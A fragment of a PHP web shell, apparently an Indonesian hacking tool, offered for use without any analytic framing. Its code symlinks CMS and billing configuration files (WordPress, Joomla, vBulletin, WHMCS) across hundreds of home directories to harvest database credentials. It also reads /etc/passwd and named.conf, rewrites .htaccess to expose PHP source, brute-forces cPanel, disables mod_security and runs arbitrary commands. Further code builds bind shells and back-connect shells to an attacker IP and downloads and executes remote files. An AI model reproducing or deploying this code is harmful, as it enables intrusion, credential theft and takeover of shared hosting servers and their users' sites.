symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "[ Done ]"; echo "
| Go Here |"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk= '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo ""; unlink("test.txt"); echo "[ Done ]"; echo "
| Go Here |"; } echo "
BACK"; exit; } ?>

Cpanel BruteForce

Cpanel BruteForce

'; echo ''; } ?>

User : <?php system('ls /var/mail');?>

Pass :

Type : Simple : /etc/passwd :

Get Config :

Folder Name :

Get Wordlist

Url Config :

Info Security

Safe Mode

Desible Function
No Security for Function"; }else{ echo ''; echo "$func"; echo '

"; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die("Error: Safe_mode = On "); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die ("[-] jancookkk gak iso di jumping :D"); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)){ $str = fgets($passwd); if ($i > 100){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username); array_push($pub,$dirz); } } } $i++; } foreach ($users as $user){ echo '[Jebrett !] /home/'.$user.'/public_html/
'; } } // fungsi upload elseif(isset($_GET['x']) && ($_GET['x'] == 'cr00t')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } ?>

Upload from computer

Process found running, backdoor setup successfully.
"; } else { $msg = "
Process not found running, backdoor not setup successfully.
"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "
Process found running, backdoor setup successfully.
"; } else { $msg = "
Process not found running, backdoor not setup successfully.
"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Port Binding Connect Back Load and Exploit

Port

Password

Use

IP ">

Port

Use

url

cmd

<?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?>

SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off "; file_put_contents("php.ini",$byphp); file_put_contents(".htaccess",$byht); echo ""; die();} ?>

[+] There are : [ ".count($domains)." ] Domain
Domain	User
$domain	".$user['name']."

<?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?>

<?php echo $content; ?>
Save as

Not Found

Reverse shell ( php )

Metasploit Connection

Password Hash

Symlink Server

"; echo $liz0; echo $liz0zim; echo "

Local Domain Viewer